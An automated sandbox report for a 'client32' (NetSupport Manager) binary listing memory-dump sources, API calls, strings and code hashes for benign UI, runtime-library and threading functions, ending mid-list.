Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: ..\ctl32\liststat.cpp$..\ctl32\listview.cpp$m_hWnd
API String ID: 819365019-2727927828
Opcode ID: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
Instruction ID: e80c3d609587989e24333d1fa603ed55b2b214ac37036ff82e40f0e660cda7c6
Opcode Fuzzy Hash: 9b6d80b7455542f82354b29f9862b6f032892670bc7ed0853ece567b39401bfb
Instruction Fuzzy Hash: 6BF0F038B80325AFE321D681EC81FC5B2949B05B05F100828F2462B6D0EAA5B4C0C781

Function 1101D100 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D12F
ShowWindow.USER32(00000000), ref: 1101D136

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 1101D116
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D111

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitItemLastMessageProcessShowWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1319256379-1986719024
Opcode ID: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
Instruction ID: 4e2be1340c0eb87c864e4721684ff6510800268e2acfe58ec4bc6308307db221
Opcode Fuzzy Hash: 5591af17a89e0ca7adab3af439ec82609681faf43d0b1edc9c864f49cd37c925
Instruction Fuzzy Hash: 4AE0867A910329BFC310EE61DC89FDBF7ACDB45754F10C429FA2947200D674E94087A1

Function 1101D0B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 1101D0DB
EnableWindow.USER32(00000000,?), ref: 1101D0E6

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 1101D0C6
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 1101D0C1

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableErrorExitItemLastMessageProcessWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 1136984157-1986719024
Opcode ID: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
Instruction ID: 2b1270b1ce6598f01739890776adf1a6d9f8641e6ea7dfdd3b9eef3de0244db5
Opcode Fuzzy Hash: 9b6c0fd9a44062357b394c58c00652d207fdc6b2e6a946a601fd6034372f8a5b
Instruction Fuzzy Hash: 45E02636A00329BFD310EAA1DC84F9BF3ACEB44360F00C429FA6583600CA31E84087A1

Function 685BEB03 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 685BEB9E
__flush.LIBCMT ref: 685BEBBC
__write.LIBCMT ref: 685BEBE3
__flsbuf.LIBCMT ref: 685BEC0E

Part of subcall function 685B60F9: __getptd_noexit.LIBCMT ref: 685B60F9

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
Instruction ID: ea3493c0fd7c255a111d49499dbcdc666525785bb7d3851377e371b56622ff65
Opcode Fuzzy Hash: 08c01935fc771ded5e1dc1816cdb0982bbac6150f0b205de900957a3203d3a0a
Instruction Fuzzy Hash: 9741C531A00B05DBDB15CFA9C8A469EBBB6FFE0364FA885ADD47697180D770DE418B40

Function 685AF9A0 Relevance: 6.1, APIs: 4, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 685ADBD0: _malloc.LIBCMT ref: 685ADBE9
Part of subcall function 685ADBD0: wsprintfA.USER32 ref: 685ADC04
Part of subcall function 685ADBD0: _memset.LIBCMT ref: 685ADC27

std::exception::exception.LIBCMT ref: 685AF9F9
__CxxThrowException@8.LIBCMT ref: 685AFA0E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: 7e2876ccaa390735356246e316e5beff78fed1f3dddcbd100c0be918afea6180
Instruction ID: 91075a17ab5724a97b05d96a0cd00169cd6862e353bad98375218521cef0cfac
Opcode Fuzzy Hash: 7e2876ccaa390735356246e316e5beff78fed1f3dddcbd100c0be918afea6180
Instruction Fuzzy Hash: 1231A2B9A04308ABC724DF58E8409ABF7F8EF98304F44856EE85A97740E771ED04CB95

Function 110351A0 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

std::exception::exception.LIBCMT ref: 11035277
__CxxThrowException@8.LIBCMT ref: 1103528C
std::exception::exception.LIBCMT ref: 1103529B
__CxxThrowException@8.LIBCMT ref: 110352B0

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$_memsetwsprintf
String ID:
API String ID: 959338265-0
Opcode ID: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
Instruction ID: 4202d9b2a3b9504ee52c3147c78dbba3f188beb93750ea11af99058fe090304e
Opcode Fuzzy Hash: 58b7df8abda35fa66d394f383b262c333d8c95bf7682913761b522499381d223
Instruction Fuzzy Hash: 14411BB5D00619AFCB10CF8AD880AAEFBF8FFA8604F10855FE555A7250E7716604CF91

Function 685CDF86 Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 685CDFBA
__isleadbyte_l.LIBCMT ref: 685CDFED
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?), ref: 685CE01E
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?), ref: 685CE08C

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: dee4bc8008b509b8d4174f1fb5c210395060e9f1cf6e688c3d856b2bc7f8ff43
Instruction ID: 8fb9a6d004f0e316e8fc07f73ac04319c500e60c012231e056d89a4b1b1a32ca
Opcode Fuzzy Hash: dee4bc8008b509b8d4174f1fb5c210395060e9f1cf6e688c3d856b2bc7f8ff43
Instruction Fuzzy Hash: 33319A31A44286EFDB10DFE8C885AAE7BB5BF02310F9185ADE4749B190D731D981DF92

Function 11175085 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111750B9
__isleadbyte_l.LIBCMT ref: 111750EC
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117511D
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,11175CE8,00000109,00BFBBEF,00000003), ref: 1117518B

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
Instruction ID: 460b63ceb136a055cb04312f44383bb8d9651ef64d988a6b12a47e6aec4ca511
Opcode Fuzzy Hash: 045b0a910df906f647033cf6f86075e5ea6c3d6d2e1d9b3d8c151f3dfdd204cc
Instruction Fuzzy Hash: 59310431A042C6EFDB42DF64CD80AAEBFB5FF01315F168569E4658B291E731DA80CB91

Function 110CD2A0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 110CCA10: EnterCriticalSection.KERNEL32(00000000,00000000,7E4636A2,?,?,?,7E4636A2), ref: 110CCA4A
Part of subcall function 110CCA10: LeaveCriticalSection.KERNEL32(00000000,?,?,?,7E4636A2), ref: 110CCAB2

IsWindow.USER32(?), ref: 110CD2FB

Part of subcall function 110CAFC0: GetCurrentThreadId.KERNEL32 ref: 110CAFC9

RemovePropA.USER32(?), ref: 110CD328
DeleteObject.GDI32(?), ref: 110CD33C
DeleteObject.GDI32(?), ref: 110CD346

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalDeleteObjectSection$CurrentEnterLeavePropRemoveThreadWindow
String ID:
API String ID: 3515130325-0
Opcode ID: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
Instruction ID: 1912d5f7d6517959c15795f1203ad34c6d2ee6b6a386a3d84c59d9fd341526e4
Opcode Fuzzy Hash: dfaa25823bd437af00b48b9cb039003f0fe96ea0139f721f484334f7840a211f
Instruction Fuzzy Hash: 57214BB5E007559BDB20DF69D844B5FFBE8AB44B18F004A6DE86297680D774E440CB90

Function 68595950 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,?,?,6859D68F), ref: 6859596C
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,6859D68F), ref: 6859597D
SetEvent.KERNEL32(00000304,?,?,?,?,?,6859D68F), ref: 685959B7
LeaveCriticalSection.KERNEL32(685DB898,?,?,?,?,?,6859D68F), ref: 685959CC

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: 20ccfea9f0aa10ced624ac50572de837c5f64a7a2195ce53b02efd576ebc9f95
Instruction ID: a27c190c386f471bedda409248b0e438a294afb763294768ad4929a7779f8772
Opcode Fuzzy Hash: 20ccfea9f0aa10ced624ac50572de837c5f64a7a2195ce53b02efd576ebc9f95
Instruction Fuzzy Hash: 05219C71D01248AFDF00EF68C8047EEBBF6EB49315F91815AEC5AA7240E7315A44CB99

Function 110590DC Relevance: 6.1, APIs: 4, Instructions: 72timeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 110590FC
LeaveCriticalSection.KERNEL32(?), ref: 110591AA
EnterCriticalSection.KERNEL32(?), ref: 110591C4
LeaveCriticalSection.KERNEL32(?), ref: 110591E9

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterTimetime
String ID:
API String ID: 1178526778-0
Opcode ID: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
Instruction ID: de64faa2bc893f0042d2db027e64659f3d2cecc70f566eade1ffbf0f13490889
Opcode Fuzzy Hash: 5a3294d831c3680f41abea4f07c433e1b64d8288a9482612daab4534a2a8c4f2
Instruction Fuzzy Hash: 85216B75E006269FCB84DFA8C8C496EF7B8FF497047008A6DE926D7604E730E910CBA0

Function 1103D0B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 68sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4,00000000,?), ref: 1103D0E1

Strings

redirect:http://127.0.0.1, xrefs: 1103D12D
:%u, xrefs: 1103D13F
/weblock.htm, xrefs: 1103D14D

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: /weblock.htm$:%u$redirect:http://127.0.0.1
API String ID: 3472027048-2181447511
Opcode ID: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
Instruction ID: 53e0b3806bd00902e3668edf75962450fe0504f4029adcdddc47de674a55a881
Opcode Fuzzy Hash: 73219fc91a885bec8c3d53282fd7fd25bd90ae77e27c8345a4b14af61fd7c86f
Instruction Fuzzy Hash: 3D11B975F0112EEFFB11DBA4DC40FBEF7A99B41709F0141E9ED1997280DA616D0187A2

Function 1115F274 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 1115F295

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
